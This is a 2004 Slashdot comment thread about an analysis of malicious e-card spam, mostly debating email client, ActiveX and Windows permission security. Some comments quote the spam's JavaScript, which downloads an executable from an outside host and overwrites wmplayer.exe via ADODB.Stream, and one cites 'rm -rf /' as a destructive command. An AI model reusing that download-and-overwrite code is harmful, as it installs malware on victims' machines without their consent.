Catch up on stories from the past week (and beyond) at the Slashdot story archive

 



Forgot your password?
typodupeerror
×
Spam Security

Malicious E-Cards - An Analysis of Spam 482

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."
This discussion has been archived. No new comments can be posted.

Malicious E-Cards - An Analysis of Spam

Comments Filter:
  • I hate ecards (Score:5, Insightful)

    by jwthompson2 ( 749521 ) * on Monday February 16, 2004 @11:19AM (#8293829) Homepage
    This definitely could be a nasty little thing, thanks to poor security on remote executables. Wouldn't modification of default internet security settings go a long way to resolve this particular instance? Of course as a Mac user I don't have much to worry about with this.

    Does anyone else think that our society is overdue on becoming fed up with all these sort of things?

    ---
    Mod me down, I'm already -1...woot!
    • by turnstyle ( 588788 ) on Monday February 16, 2004 @11:31AM (#8293939) Homepage
      I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!

      It's an easy way to protect yourself from all sorts of stupid stuff.

      Ahem, turn off HTML viewing in your email client NOW.

      • by ackthpt ( 218170 ) * on Monday February 16, 2004 @11:42AM (#8294047) Homepage Journal
        I've been usuing The Bat (www.ritlabs.com) for about 5 years now, and it's great. No worms, no virii, no pop-ups, no crap. I view all my email as text. And they've been continuously improving the product.

        Support shareware :-)

        • by JPriest ( 547211 ) on Monday February 16, 2004 @12:04PM (#8294285) Homepage
          There is a client called pocomail [pocomail.com] that I use that is pretty safe. It has an intuitive spam filter, you can script it to do about anything with mail, and it has a simple filter setup for sending messages from X to folder Y.

          spam filter:
          "viagra", +9
          "herbal", +6
          "natural", +6
          "to be removed", +5
          "free", +2
          "!!!", +2

          You get the point. You can toggle things like loading external graphics etc. It is really a mail client for power users. Shareware, but one of the few programs I ever purchased.

        • by EasyTarget ( 43516 ) on Monday February 16, 2004 @01:11PM (#8295016) Journal
          I've been usuing The Bat (www.ritlabs.com) for about 5 years now, and it's great. No worms, no virii, no pop-ups, no crap. I view all my email as text. And they've been continuously improving the product.

          Where to start.. I finally ditched the Bat! after my five years last week.. and good riddance.

          The UI has not evolved, sure lots of new features get added over the years, but they all end up as hacks into an already clumsy interface.

          The UI is a classic case of a few -really- good features (I do appreciate them) surrounded by poo. Auto-formating in the text is useless, NEVER paste some code and try to annotate it, turning it off leaves everything else looking ugly. Even Outlook manages to format it's messages better.

          The UI displays a classic 'designed by the developers' illness. They can't see it's flaws because they're too embedded in the development. If they'd just employ a professional UI designer to re-jig it, and actually do the things suggested, then it would be a world-beater.

          And you now have to upgrade ($$$) to the latest version to stay current. It's just the same as the old one, hardly any worthwhile new features. A money-spinning enforced upgrade of the most cynical sort.

          If you want it's fantastic filtering systems, wonderful templates, clever widgets, superb PGP support etc.. and are prepared to put a lot of effort and patience into learning and using it, then I heartily recommend it.

          If all you want to do is write emails to people, and read ones you receive, save yourself time and money by looking elsewhere.
      • by Anonymous Coward on Monday February 16, 2004 @11:45AM (#8294085)
        But that's a cool feature!

        What next? Should I stop using Outlook???
      • There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just words. I do tech support, and I'm THRILLED when the person on "the other end of the line" sends me an HTML e-mail, because it means I can use the features of HTML mail to provide him or her a clearer, more visible explanation, and if that person has a decent Internet connection, I can even ask them to paste screenshots into their e-mails instead of trying to guess which client they have and how pasting attachments in it works, and then explaining it to them and hoping they understand.

        Erik
        • by pldms ( 136522 ) on Monday February 16, 2004 @12:05PM (#8294301)
          There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just word

          Ok, but that doesn't require html; MIME can do this fine. In fact it's better since the image is part of the message,
        • features of HTML mail ... paste screenshots

          And pasting a screen shot into a word processing document, then attaching that is not OK? Yes, a little more work, but the benefit is safer Internet use for the rest of us.

          Email is Email. HTML is for Web pages. The marriage of the two (Thanks Bill!) makes SPAM more dangerous, lets the email sender track you (via 1x1 images), and makes email messages MUCH larger thereby wasting bandwidth.
          • OR (Score:5, Interesting)

            by diablobynight ( 646304 ) on Monday February 16, 2004 @12:27PM (#8294540) Journal
            You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you, I mean their are times when I take the chance, but lets face it, how often do random people email your personal account? And if your talking a webmaster or sales account, then yes, turn off html, or have your IT guy set up your securities properly.
            • Re:OR (Score:5, Insightful)

              by RetroGeek ( 206522 ) on Monday February 16, 2004 @12:40PM (#8294680) Homepage
              You could just simply not view messages from people you don't know.

              Otherwise known as a white list.

              Yes, these work, but part of the utility of the email system is that you CAN get messages from unknown people. I read your email address at some interesting site (slashdot?) and I want to have a one2one conversation with you. So I send you an email. You don't know me from anyone, yet we can have a discussion about something without the entire world being privy to it.

              And this is the real bad effect that SPAM has created. We no longer trust strangers.

              Sigh...
              • Re:OR (Score:4, Insightful)

                by Reziac ( 43301 ) on Monday February 16, 2004 @08:27PM (#8299714) Homepage Journal
                There's also the little minor issue that even people on your whitelist can unknowingly send you malicious email.

                Realworld example: My sister (who, *if* I used a whitelist, would naturally be on it) added some downloaded toolbar to her browser, which in turn reformatted her email as it was being sent (she never saw the alterations)... and what I got in my mailbox was HTML formatted, with javascript that tried to fetch and install the same spyware toolbar (but was foiled by my braindead mail client).

                And other folks on private mailing lists I'm on (which would also be whitelisted) have also unknowingly sent virus attachments. This happened on a mailing list populated by sysadmins, not exactly "regular users who don't know anything".

                Crap, now I gotta go find another story to spend my mod points on :)

        • by gad_zuki! ( 70830 ) on Monday February 16, 2004 @01:50PM (#8295497)
          The only real "exploit" here is the activeX installer. Most email clients render plain-text URLs clickable anyway.

          There's a reason why this stuff is written with activex controls - they look official like they're from the operating system. Disable activex and watch the spyware go away. It seems most people know not to download an .exe but think activeX, expecially when its "signed," means that its safe.
      • by gnu-generation-one ( 717590 ) on Monday February 16, 2004 @12:52PM (#8294810) Homepage
        "I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!... It's an easy way to protect yourself from all sorts of stupid stuff... Ahem, turn off HTML viewing in your email client NOW.

        I misread that as "turn off HTML viewing in your web browser NOW", and wondered why it wasn't marked as funny...

        Well, it would make some things safer...
    • Re:I hate ecards (Score:5, Insightful)

      by ONOIML8 ( 23262 ) on Monday February 16, 2004 @12:06PM (#8294306) Homepage
      "Of course as a Mac user I don't have much to worry about with this."

      Perhaps you should. Most windows users are somewhat prepared for things like this because it's become a matter of routine. (sick as that is).

      But the average Mac or Linux user wouldn't know what hit 'em. It's good for us to stay alert, be cautious, worry a bit.

  • Frightening (Score:5, Insightful)

    by JackBuckley ( 696547 ) on Monday February 16, 2004 @11:19AM (#8293832) Homepage
    This is a fascinating bit of detective work that should serve as a reminder to all careless users (especially Windows ones) that *SPAM IS NOT BENIGN*. It's not just annoying ads for penile implants--it can be downright dangerous to your PC.
    • Re:Frightening (Score:5, Insightful)

      by Alizarin Erythrosin ( 457981 ) on Monday February 16, 2004 @11:25AM (#8293879)
      Quite right. Not only can it be dangerous to your PC or bank account (if they install a key logger too, for example), but stuff like this steals your bandwidth, which some people in this world still pay for by amount, not a flat rate.

      Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.
      • Re:Frightening (Score:5, Insightful)

        by harmonica ( 29841 ) on Monday February 16, 2004 @12:09PM (#8294334)
        Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

        I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

        But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.
        • I'm quite sure... (Score:5, Insightful)

          by Kjella ( 173770 ) on Monday February 16, 2004 @01:17PM (#8295091) Homepage
          I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

          But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.


          ...that Microsoft really would like to change it. They're not exactly too happy about their reputation for spam etc. Then real issue is that consumers don't want security - oh they say they do but they don't. They just want to have their cake and eat it too.

          Users expect being able to double-click a file and have an application run or install itself - yet they would like it not to happen when they do the exact same with a virus/trojan. They would like all their favorite programs to be allowed access the internet - and for all spyware/trojans to be blocked automatically. They would like for their files to be private - but not the hassle of identifying to the computer.

          It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI. The real truth is that most people don't understand a computer worth shit. Sec-uh-rity even less.

          They're like a kid with a full chemistry set. They'll play around with it, and most of the time it's cool. Then they manage to make something toxic or explosive or worse, but somehow that's the chemistry set's fault and it simply shouldn't allow you to make anything dangerous.

          But try suggesting to them up front that they should get a "Chemistry kit for Kids" or "Chemistry kit for dummies" where it's reaaaally hard to screw up and they'll complain their wits out that it doesn't do what they want and that they're ready for the real deal and that they know what they're doing.

          So what do you do when grown men want to buy the full kit, even when you know it'll blow up in their faces? Refuse to sell it to them? Require a "driver's licence" of sorts? Don't tell me it'll all be better with Linux. Right now it's so hard, they won't use it at all, but by the time it gets easy enough that you expect everyone to manage their own desktop (as opposed to now, where you mostly need the local Linux guru), they will screw up their machines just as badly.

          Kjella
    • Amazing, really (Score:5, Insightful)

      by mao che minh ( 611166 ) on Monday February 16, 2004 @11:48AM (#8294129) Journal
      It still amazes me that people (the average user, I should say) can not grasp the reality of the Internet: your system, in the safe confines of your home, is connected to a network of billions. Anyone capable of reaching the Internet can reach your system. The world is full of villians.

      And yet a person that has been surfing the web and using email for the past 6 or 7 years is still shocked when they click on Britney's Web Cam XXX HOT Pics and end up with a phone bill of $500 for dialing the Hot Russian Wives Club.

  • by Anonymous Coward on Monday February 16, 2004 @11:21AM (#8293837)
    Hi. I'm Troy McClure. You might remember me from such e-mail how-to videos as "Nigeria: Your Path to Riches" and "Can I Lengthen my Penis 73 inches if I answer 22 emails?"
    • by ggvaidya ( 747058 ) on Monday February 16, 2004 @11:25AM (#8293885) Homepage Journal
      ... "This time, I'm here to screw up your computer and install a virus! How about that? Let's get started ..."

      Why do the poor virus writers go through all this trouble anyways? Don't they know they can get 60% of the machines out there with just an e-mail with an attachment?

      Then again, nowadays a lot of attention is being focused on trojan horses. What about real viruses - something not even hackers can figure out easily? It can't be too hard to write a trojan horse which pretends to be a cool little game for a month or so - before deleting all your files. Can it?

      • Virus vs. Spam (Score:5, Interesting)

        by the grace of R'hllor ( 530051 ) on Monday February 16, 2004 @12:01PM (#8294262)
        Because Viruses can do better with some effort.

        MSBlaster is still going around. My own average from installing a base WinXP (and forgetting the Blaster fix and other updates) is about two minutes to being infected with the Blaster worm. A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

        E-mail just can't beat those times.

  • Spam in Outlook (Score:5, Interesting)

    by DoorFrame ( 22108 ) on Monday February 16, 2004 @11:24AM (#8293872) Homepage
    I was having a discussion with a friend the other day about Outlook email virii, and I quite frankly wasn't sure anymore. If a windows box is completely updated, is it possible for an email to be able to unload/execute a virus without a user openning an attachment or clicking on an off-email link? Any examples?
    • Re:Spam in Outlook (Score:5, Insightful)

      by Anonymous Coward on Monday February 16, 2004 @11:26AM (#8293888)
      1. It's viruses. 2. Yes, if the exploit in question has not yet been patched.
    • Re:Spam in Outlook (Score:5, Insightful)

      by dave420-2 ( 748377 ) on Monday February 16, 2004 @11:38AM (#8294020)
      The real problem isn't the technology, but the users. The same principle behind users opening unknown attachments also exhibits itself in the form of people deleting their windows directory.

      Windows, through its near-global adoption and ease-of-use (you can argue the point, but as 98% of desktops are windows, it's a weak argument) has users of every technical ability. It has the users too dumb to use linux. Those guys are the ultimate trojan horse. They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.

      The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released. The same goes for Macs. The most popular and wide-spread software is always the first to get its copy-protection removed, the first on FTP sites, and the first with known exploits.

      Remember "security through obscurity"? Well, the reverse applies, too.

      • Re:Spam in Outlook (Score:5, Informative)

        by MooCows ( 718367 ) on Monday February 16, 2004 @12:06PM (#8294305)
        This argument has been going on forever.
        And, IMHO, is only partly correct.
        Windows and it's apps have many "by design" security flaws.

        Short list:
        - Horrible data-binding in many apps (IE/Outlook/etc)
        - Enabling scripts in emails to run in the local zone
        - No warnings for insecure passwords
        - NetBIOS open by default for the internet
        - IIS, period
        - Null sessions
        - Password hashing flaw (l0pth)

        Some of these are fixed, some are not.

        Apache runs on the majority of servers, and it isn't by far hacked as much... just figure.
    • Re:Spam in Outlook (Score:3, Insightful)

      by 77Punker ( 673758 )
      As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if you're box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.
      • As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if you're box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.

        Of course, it could be pointed out that this is true for any piece of software.

        It's sort of a truism-- if a cracker is aware of an exploit that the OSS community does not know about, then your linux/BSD bo
  • by Rope_a_Dope ( 522981 ) on Monday February 16, 2004 @11:24AM (#8293875)
    ActiveX actually lets a webpage rewrite your wmplayer.exe file with its own version. If an Activex control can rewrite any executable on a Windows box, then I assume that any piece of the Windows kernel is vulnerable. This leads to a larger question, which is, "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?".
    • by gfecyk ( 117430 ) on Monday February 16, 2004 @11:29AM (#8293926) Homepage Journal
      Win98 is supposed to be gone, or no longer supported.

      Assuming that, and that your WinLusers are running current versions of Windows with actual security, and they're running as regular users, a web page CAN'T overwrite anything because regular users don't have write permissions in %systemroot% or in Program Files.

      Problem solved. Without a script blocker or any other third-party garbage.
    • by ggvaidya ( 747058 ) on Monday February 16, 2004 @11:31AM (#8293934) Homepage Journal
      I think you have to be Administrator for the re-write to work. Then again, most of the people I know run as administrator, so ...
    • by bhtooefr ( 649901 ) <[gro.rfeoothb] [ta] [rfeoothb]> on Monday February 16, 2004 @11:33AM (#8293957) Homepage Journal
      There's Trend Micro's HouseCall, which is an ActiveX applet that runs virus scans. Actually, most diagnostic web sites have ActiveX. Also, PowerLeap's InSPECS system requires IE with ActiveX enabled.
    • by CdBee ( 742846 ) on Monday February 16, 2004 @11:36AM (#8293997)
      "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

      (MSN) Chatrooms and Windowsupdate spring to mind as web-based uses of ActivX. Microsoft's decision to ship no Java Virtual Machine in Windows XP doesn't seem to have brought any more users into ActivX chatrooms though, I've seen chatroom moderators recommending users to download Mozilla :-)

      One extra worrying thing though, when you go into an MSN Groups chatroom with Mozilla on Windows, to install the ActivX control for the chatroom you have to install Microsoft ActivX Wrapper for Netscape

      Potentially, Mozilla users are now affected by ActivX insecurities if they accept this download.
    • Actually, there are legitimate uses for ActiveX. One example being the Remote Desktop Web Client. It's a simple little ActiveX control that lets you log into your computer without having to install the terminal services client. While I would love to be able to get rid of that, it really isn't possible. The "engineer" where I work is a paranoid dolt who insists that no one should ever be allowed to install anything on any of the computers in the office (including popup killers...imagine the horror) and won't
    • by lordDallan ( 685707 ) on Monday February 16, 2004 @11:47AM (#8294109)
      The better question is why does Windows XP Home only have two user types, a totally crippled limited user (i.e. sh*t doesn't work half the time - so nobody uses it) or a full power, overwrite anything, viruses-be-damned administrator.

      Basically, by having only these two types of users (and not a happy compromise like Win 2K's "Power User"), Microsoft has virtually guaranteed that home users on their newest OS will remain vulnerable to exploits.

      If MS wants to do something really helpful to Windows security in their next Service Pack, they should add a "Power User" account type to Windows XP Home.
    • Is there anybody that actually uses ActiveX on a webpage

      I'm forced to use IE at work with the "prompt before accepting activeX components" option turned on. You think pop-ups are bad, you should try this! It seems to be used for any kind of plugin (flash, etc), and most pages with adverts, even slashdot, contain activeX of some kind. It really highlights how dangerous IE is - even when you're prompted, you don't know what you're accepting - you could be trying to view a PDF file - and if you accept it y

    • by LostCluster ( 625375 ) * on Monday February 16, 2004 @12:09PM (#8294339)
      ActiveX is not sandboxed at all like Java is. So, like any powerful tool, it can be used for both good and bad.

      Windows Update depends on ActiveX to determine which updates a user already has. Many virus-scanning websites need to be able to read and (and when cleaning, write to) every file on the system, so they need ActiveX too.

      When it comes down to it, ActiveX controls are just as powerful as any other executable, which is why the user is presented with a security certificate before they run. I think the critical flaw in ActiveX is right there at that dialog box, because the default answer is "Yes" and users don't read the whole thing to understand what it means.
  • by tgma ( 584406 ) on Monday February 16, 2004 @11:25AM (#8293886)
    While I commend the original article as an interesting dissection of an attempted attack via spam, the heading is a little sensational. It mentions Russian spyware sites, but the site in question is Spylog.com, a reputable Russian monitoring site. Not everything on the Russian internet is malicious, and Spylog does some good work on reporting statistics about the Russian internet.

    Just a minor correction.
  • by DoorFrame ( 22108 ) on Monday February 16, 2004 @11:27AM (#8293902) Homepage
    This story is presented as an example of the bad things that can happen from opening spam in Outlook ("If you're still using Outlook and Internet Explorer, this is a good time to find alternatives"). But the story doesn't point to any actual isssue with Outlook, only exploits in Explorer that allow downloaded code to be executed remotely. The Outlook bashing seems out of place.
  • At what point (Score:5, Insightful)

    by GigsVT ( 208848 ) on Monday February 16, 2004 @11:27AM (#8293904) Journal
    Does this stuff get treated like a virus/trojan, rather than legitimate business?

    If that Osama Bin Laden AIM virus isn't a virus, then I don't know what is. Yet I don't see news stories about the FBI or SS arresting the people that wrote it, even though they are more or less out in the open.

    It seems the rule lately is if you have a commercial intent, then it's OK for you to write viruses and trojans (like weatherbug).

    People actually get pissed off when we tell them they can't have weatherbug on their computer.
  • by TopShelf ( 92521 ) on Monday February 16, 2004 @11:28AM (#8293913) Homepage Journal
    The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure, or is it just that black hats like this are going after the 90%+ out there using MS products due to the size of opportunity?

    Not trolling, just asking an honest question here.
    • The "alternative" clients typically do not do things like run scripts, overwrite files, etc without at least a confirmation from the user. The problem is that IE and Outlook are so feature rich, and so easily configured (historically by default) to gullibly trust any command that comes down the pipe, that they pose a severe risk to exactly the class of users (i.e. inexperienced or ignorant) that most frequently use them.

      So, in effect, yes, there is an aspect to the other clients that is inherently more sec
    • by jfengel ( 409917 ) on Monday February 16, 2004 @11:48AM (#8294128) Homepage Journal
      Security through obscurity never works, but there is something to be said for security through diversity. It works because it lowers the "payoff" of writing worms, perhaps to the point where it's no longer worth the effort.

      Without an exhaustive code analysis of Outlook I can't say for certain, but Outlook has a lot of code in it that dates back before malicious worms became a daily occurrence. Because of that, the code seems to have been written with other goals than security in mind.

      I don't mean that to insult MS; it's only in the last five years or so that "absolutely MUST be secure" has been a real consideration for any vendor. Look at Windows 95's silly logon procedures. Before that, many features were added that were dangerous but, in Microsoft's opinion, useful. At least it made a spiffy demo to have systems administrators updating every desktop in the office just by sending email.

      Firebird, etc. have been written in a rather more paranoid age. I'm certain that there are potentially disastrous bugs in it. In this case I have read the code, and I've found a lot of nice defensive programming, but that doesn't preclude mistakes that the authors, me, and a thousand others might all have missed.

      Still, having be written for security from the ground up, with no silly code-executing features and strings all well protected from buffer overruns, I'm putting my faith in the ground-up rewrite that is Firebird/fox to Microsoft's apparently slapdash Outlook/IE combo.

      Microsoft appears to be improving its code, not least because of the withering hail of worms thrown at it because it's the market leader and therefore has the biggest payoff. These days worms all seem to depend not on security holes but on user stupidity or user laziness. This particular article is pointing out a worm that propagates through well-known, and supposedly well-patched, techniques. But there are obviously people out there on whom it works.

      Eventually, Microsoft will have to fix both user stupidity and user laziness in code. Eventually, any new program you receive is going to have to have a system administrator's explicit authorization to run or install itself for the first time. Even "sandboxed" environments like Java can't prevent a user from running an executable and doing at least limited damage. I suspect that someday, code will simply not be authorized to run at all without more than a mouse click between you and ruin.
      • by Kombat ( 93720 ) <kevin@swanweddingphotography.com> on Monday February 16, 2004 @12:24PM (#8294514)
        Security through obscurity never works

        Hogwash. There are plenty of examples where "Security through obscurity" works just fine. Take, for example, Timothy McVeigh's execution. It took place in Indiana, but due to the large number of victims' families who wished to view the execution in Oklahoma, and who couldn't travel, the execution was broadcast via a closed-circuit satellite link to a gymnasium in Oklahoma. There was an extremely strong demand for the general public to tap into that feed. Hackers everywhere could have made an enormous name for themselves if they'd been able to intercept and decrypt that signal. But, since neither the specifics of the transmission of the signal, nor the encryption method used were ever made public, no one captured the signal, and a search for "Timothy McVeigh Execution" on Kazzaa returns 0 results. Security through obscurity worked in this example.

        Here's another example. Do you have any idea about the internal layout of the Pentagon? Of course not. The floor plans are top secret. The locations of secret escape hallways are all top secret. The knowledge is "obscured." And consequently, the Pentagon has never been physically broken into. If all you naive "openness is more secure" zealots had your way, then the entire schematic of the Pentagon, Whitehouse, NORAD, and everything else would be all over the net, for us "White hats" to scrutinize and improve. Unfortunately, we'd all argue over what the "right" way to do things would be, and meanwhile, bin Laden's disciples would be delivering suicide-bomb-after-suicide-bomb to Bush's bedside.

        I admit that "Security through obscurity" is not a silver bullet, and in many cases, is less desirable than open approaches. However, it is obvious that neither is your suggestion that open solutions are always best, correct. It should be clear to even the most fervent zealot that sometimes, a layer of obscurity is appropriate, and enhances the security of a situation that has already been thoroughly scrutinized by a variety of experts.
        • by Sgt York ( 591446 ) <`ten.knilhtrae' `ta' `mlovj'> on Monday February 16, 2004 @01:19PM (#8295109)
          Well, security through obscurity works, but only when the obscurity is at or very near 100%. In the Pentagon, no one is allowed to see the layout, and only certain people are allowed to interact with any part of it. The McVeigh execution was the same way, no one got to see any details of it. IIRC, the exact time/date wasn't even announced until the last minute.

          However, in software you can't have that near 100% obscurity because large numbers of people have to use the software. Take the Pentagon example. If it was necessary for a very large number of people to have somewhat limited access to the building on a continual basis, the security would eventually break down. The floor plan would eventually be at least partially elucidated and this could allow further security breaches, leading to the discovery of more of the floor plan, etc.

          The whole point of making software (like this) is so that lots of people will use it routinely. This high volume, routine use does eventually lead to a breach in the security of the software.

          I agree that the flat, absolute statement "security through obscurity never works" is incorrect. However, that pure obscurity is exceptionally rare, alomst to the point of nonexsistence in the software world.

    • by orthogonal ( 588627 ) on Monday February 16, 2004 @12:13PM (#8294386) Journal
      The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure...?

      Fire{WHATEVER_WEEK_THIS_IS} doesn'tt, so far as I know do this:
      var x = new ActiveXObject("Microsoft.XMLHTTP");
      x.Open("GET", "http://adversting.co.uk/a.exe",0);
      x.Send();

      var s = new ActiveXObject("ADODB.Stream");
      s.Mode = 3;
      s.Type = 1;
      s.Open();
      s.Write(x.responseBody);

      s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
      That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.

      No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!

      Go to web-site, get a new OS!

      And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop tho think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag?

      To the contrary, they considered it a positive feature! Why? Because Visual Basic "programers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".

      Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.

      I mean, Christ. This is just a travesty, and open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, bit I never knew javascript could be so bad.

      I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.

      Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.

      I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.

      What the hell?
  • Conclusions (Score:5, Insightful)

    by kyshtock ( 608605 ) on Monday February 16, 2004 @11:29AM (#8293919)
    I believe that there are at least 2 conclusions here:

    1. Clicking can be dangerous.

    2. If an operating system is that badly designed so one can actually overwrite an executable only by visiting a web page, than it's time to change the security settings.

  • Stay on your toes (Score:5, Insightful)

    by J. Jacques ( 708438 ) on Monday February 16, 2004 @11:31AM (#8293942) Homepage
    This story is just more proof that people need to be proactive about their email and internet browsing habits. The biggest reason that so many people fall for this sort of crap is that they expect their computer to "Just Work", like their TV or microwave. It'd be nice if PCs DID Just Work, but unfortunately it's not the case. If more Windows users would just take the time to check out more secure browsers and email clients, and be more careful about which emails they open and attachments they download, spammers would have a much harder job. It sounds really obvious to anyone savvy enough to read Slashdot, but this really isn't something that occurs to 90% of the people who own a computer.
  • I hate spam (Score:5, Insightful)

    by nycsubway ( 79012 ) on Monday February 16, 2004 @11:31AM (#8293944) Homepage
    I would love to eliminate it. To me, it's a complex engineering problem to get rid of it. The problem is presented as this:

    - spam is cheap to produce
    - a sucker is born every day
    - even if 70% of the spam sent out doesn't get to it's destination, millions of messages will still be received
    - spam filters are not installed on all mail servers
    - spam is CHEAP to produce (again)

    Cost is what stops junkmailers from filling postoffice mailboxes. Cost is the biggest barrier to preventing spam. It costs $0.20 to send a bulk mail item through the postoffice, it can get expensive if you want to send millions of junk mails.

    How can email on the internet remain free/cheap and still not allow spam to run rampant?

  • by TasosF ( 670724 ) on Monday February 16, 2004 @11:31AM (#8293947) Homepage

    Quote from that article:

    Conclusion

    If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest FireFox and Thunderbird). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.

    Or alternatively,

    you can use an HTML disabler like noHTML for Outlook Express [baxbex.com]

  • by broothal ( 186066 ) <christian@fabel.dk> on Monday February 16, 2004 @11:35AM (#8293974) Homepage Journal
    This looks pretty ugly:

    x.Open("GET", "http://adversting.co.uk/a.exe",0);

    and should never have been implemented in a browser. After all, it's not a browsers task to launch files. I remember thinking this back when Windows Explorer and Internet Explorer merged into one (you can actually type URLs in your windows explorer window). <Comic book guy> Worst idea .. ever </Comic book guy>

    • Launching Files (Score:3, Insightful)

      Actually, at one in time (DotCom boom maybe?, remember "Active Desktop", the whole point of "portals") the browser was SUPPOSED to do anything and everything. Your browser was supposed to be your desktop and that's how you'd do stuff.

      That was the point of a "home page", you could get your news and start up Word all on the same page.
    • by CTachyon ( 412849 ) <chronos AT chronos-tachyon DOT net> on Monday February 16, 2004 @12:29PM (#8294574) Homepage

      Actually, that bit of code just downloads the malicious .EXE. It's a bit dodgy that it's allowed to do it automatically (after all, it could be asking for http://spy.malware.com/cgi-bin/report?firstname=Jo hn&lastname=Doe&underwear_type=boxers...), but it's not an instant security breach itself. The actual bug is...

      s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

      ...which overwrites Media Player with the downloaded malware using ADODB.Stream (which probably never should have been enabled as a trusted ActiveX control in the first place, and certainly shouldn't be automatically overwriting files without user intervention).

  • by gfecyk ( 117430 ) on Monday February 16, 2004 @11:35AM (#8293980) Homepage Journal
    I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

    Then the evil e-cards can't overwrite wmplayer.exe or anythingelse.exe because regular users don't have write access to the Windows directory or the Program Files directory, where they're stored.

    The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root. Everyone here keeps missing the underlying problem because of their anti-M$ bias. Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.
    • by krray ( 605395 ) * on Monday February 16, 2004 @11:44AM (#8294070)
      I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

      Tell you what sparky -- YOU try that across a enterprise type installation. Actually there is ONE (1) remaining application running across any of my networks that requires Windows (2K) boxes to remain until something else is phased in: AUTOCAD.

      Go ahead -- try to install and run AutoCAD (2004 release) with Architectural and Mechanical desktops loaded ... as a regular user. I'd love to see you get AEC content networked and working on a local machine as a regular user. Good luck.

      Fortunately the engineering types are special. They've got TWO computers now. 90% of their work is done on CAD which is Windows right now -- the other 10% they tap the Mac for services (file processing, email, web, word, whatever).

      Every other sub-system requiring Windows has been replaced (for us -- started in 2000) and I have to agree with you 100% otherwise: regular users have no reason to run anything as administrator or "root". Just can't do that in the Windows world...

    • sure, and then your CD burner doesn't work. or your scanner doesn't scan. there are LOTS of end user programs out there that assume and require that you run with Admin priviledges.

      That being said, having IE download and run executables remains risky even if you are not admin: a trojan/backdoor can just as easily run from your home directory or your own "Startup Items" folder.

      the intrepid attacker can then run all manner of other exploits/social engineering once he has a local irc zombie. Of course, the sa
    • The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root.

      True, good point.

